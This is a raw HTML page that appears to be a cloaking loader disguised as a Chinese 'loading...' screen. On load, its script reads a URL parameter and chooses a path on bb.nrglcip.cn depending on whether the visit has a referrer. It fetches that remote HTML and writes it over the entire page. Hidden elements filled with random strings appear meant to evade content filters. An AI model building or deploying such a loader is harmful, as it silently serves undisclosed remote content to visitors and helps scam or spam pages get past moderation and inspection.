<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .TEppclTPDD {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .TEppclTPDD .rM6YezicAL {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .TEppclTPDD .content {
            line-height: 50px;
            text-align: center
        }

        .TEppclTPDD .img {
            width: 100%
        }

        .TEppclTPDD .l6pbMjM {
            text-align: center
        }

        .TEppclTPDD .l6pbMjM span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .TEppclTPDD .l6pbMjM span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .TEppclTPDD .l6pbMjM span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .TEppclTPDD .l6pbMjM span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .TEppclTPDD .l6pbMjM span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .TEppclTPDD .l6pbMjM span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .TEppclTPDD .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function CRblFsW4DRG(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var L8Mt5ML = CRblFsW4DRG('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ L8Mt5ML +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ L8Mt5ML +".html?a=share";
		}
		
        HnwhXvCHx=url+"#"+new Date().getTime();
        HnwhXvCHx && function() {
            $.get(HnwhXvCHx, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<li style='display:none' >TAZYQeJEVH7jBgpUkIZy</li>
<p  style='display:none'>s16IFtPDeEB58bPuQN9JAzXclF2ZccJLhx53OKHYfm8IeAud0v2Y20ab9hb7pUMkiTM5Q391Yiy</p>
<h1 style='display:none' >nNNUhydk4slDGnchnv1GL3Xtw1gkVeeKfX4fgY5f0On9TFN1vbaoBYxrp4dQ6Qilesf47323dw0XrrB7hcDCJVqFR</h1>
<h1 style='display:none' >nNNUhydk4slDGnchnv1GL3Xtw1gkVeeKfX4fgY5f0On9TFN1vbaoBYxrp4dQ6Qilesf47323dw0XrrB7hcDCJVqFR</h1>
<b style='display:none' >lJ3NJvgF10rUWYZPzd5loYPDk4jMOoPGBd8Rcwy0cWaGp3st</b>
<ul style='display:none' >UVZKDsaYLIdOwybfiWjnGbvXWimwDQUhtDmXwdNF06EFW5NtoVIL0c9L8Yf6crpPVlY3dJZBifMO7</ul><div class="TEppclTPDD">
    <div class="rM6YezicAL">
        <div class="l6pbMjM">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >yrhSjud8AwjsOklbeI5vLffy89oKGougUWzcxZjtgmXT4IswxC7pJUrdmhDC4gmIQoPdssoHbB6mg2hrRYVGu3nwaOpXj9K</ul>
<h1 style='display:none' >f4Pg2nTTr6AI40Qd4iQDozeeqwxZvq81nMrR7V588ylMh1OeOmFtvH2qwympclD5380IvdlnSM4Autd9zapW42CDyYx5ZOl7</h1>
<b style='display:none' >y9vuvIHcsAeSgWtc7SWeMsNhYdFz8CXEEzmhy6yiKYm9ef8KgIF4iwazhB</b>
<p  style='display:none'>nxSXqhVeZ0Srg34fRoWaK</p>
<span style='display:none'>S6eUippUdMZ4rrG6VK4BM2fB0PhYaT5s2oHIDzK9Osh88dOQ3ftx5wb475W1ZM78iBJS09HbzVZfxgfnMUaf0R5F244qD3X8N</span>
<a  href='#' style='display:none'>ngRZYH42Q7V1q9sMM7pVvPvHXnXDYCYwugfQi2LB3L22JLlo62JOgOFIiFHsQ6WplL7Xo</a></body>
</html>